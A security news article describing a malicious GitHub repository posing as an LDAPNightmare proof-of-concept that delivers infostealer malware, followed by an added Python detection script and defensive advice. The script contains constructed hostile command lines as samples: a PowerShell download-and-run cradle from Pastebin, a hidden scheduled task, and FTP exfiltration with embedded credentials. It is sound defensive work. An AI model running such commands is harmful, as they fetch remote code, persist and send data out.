Malicious GitHub Exploit Masquerades as LDAPNightmare PoC, Delivers Data-Stealing Malware

GitHub PoC Exploit for LDAPNightmare Discovered Spreading Infostealer Malware

Security researchers at Trend Micro have uncovered a malicious GitHub repository masquerading as a proof-of-concept (PoC) exploit for CVE-2024-49113, known as “LDAPNightmare.” The repository, which appears to be forked from SafeBreach Labs’ legitimate PoC, contains malware designed to steal sensitive information from unsuspecting users.

The PoC being impersonated targets a Windows Lightweight Directory Access Protocol (LDAP) vulnerability that Microsoft patched in December 2024. Initial confusion over the vulnerability’s designation (CVE-2024-49113 vs. CVE-2024-49112) generated heightened interest, which the attackers sought to exploit.

Technical Analysis:
– The malicious repository distributes a UPX-packed executable (poc.exe)
– Upon execution, it drops a PowerShell script in the %Temp% folder
– Creates a scheduled task that runs an encoded script
– Downloads an additional payload from Pastebin
– Collects system information, including:
  – Computer details
  – Running processes
  – Directory listings
  – IP and network adapter information
  – Installed updates
– Exfiltrates the collected data as a ZIP archive to an FTP server using hardcoded credentials
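Added example (not code from the article or from Trend Micro's report): a Python triage routine that scores process-creation command lines against the stages of the chain described above (encoded PowerShell, a script under %Temp%, scheduled-task creation, a Pastebin download, FTP with credentials embedded in the URL). The log lines, script body and hostnames are constructed, and the regexes are illustrative heuristics rather than the report's indicators.

```python
import base64
import re

# Constructed stage-two body standing in for the encoded script the report
# describes; the real script's content is not reproduced here.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed process-creation command lines as a SIEM would record them
# (e.g. from Sysmon Event ID 1); these are not indicators from the report.
SAMPLE_EVENTS = [
    ("evt-1", "powershell.exe -NoProfile -EncodedCommand " + SAMPLE_ENCODED),
    ("evt-2", 'schtasks.exe /create /tn "Updater" /tr "powershell -w hidden -File %Temp%\\stage.ps1" /sc onlogon'),
    ("evt-3", "powershell.exe -w hidden -File %Temp%\\exfil.ps1 ftp://ftpuser:PLACEHOLDER@ftp.example.invalid/"),
    ("evt-4", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
]

# One heuristic regex per stage of the chain described in the report.
ENC_ARG = re.compile(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
PATTERNS = {
    "temp_script": re.compile(r"(?:%temp%|\\AppData\\Local\\Temp\\)[^\s\"']*\.ps1", re.I),
    "scheduled_task": re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.I),
    "pastebin_download": re.compile(r"pastebin\.com/", re.I),
    "ftp_with_credentials": re.compile(r"ftp://[^\s\"'/@]+:[^\s\"'/@]+@", re.I),
}

def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand/-enc argument (base64 over UTF-16LE), or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(cmdline):
    """Sorted indicator names firing on one command line; the decoded body of an encoded command is scanned too."""
    hits = set()
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.add("encoded_powershell")
        text = cmdline + "\n" + decoded
    hits.update(name for name, rx in PATTERNS.items() if rx.search(text))
    return sorted(hits)

def triage(events, min_hits=2):
    """(event_id, indicators) for events matching at least min_hits indicators; one hit alone is not flagged."""
    scored = [(eid, score_event(cmd)) for eid, cmd in events]
    return [(eid, hits) for eid, hits in scored if len(hits) >= min_hits]
```

A single indicator such as scheduled-task creation is common in benign administration, which is why the example requires two stages of the chain to coincide before flagging an event.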

Security Recommendations:
– Only download PoC exploits from reputable security researchers and firms
– Verify repository authenticity
– Review code before execution
– Scan binaries with VirusTotal
– Avoid obfuscated code
– Exercise caution when downloading public exploits

This incident serves as a reminder that threat actors continue to leverage GitHub’s platform to distribute malware through seemingly legitimate security tools.
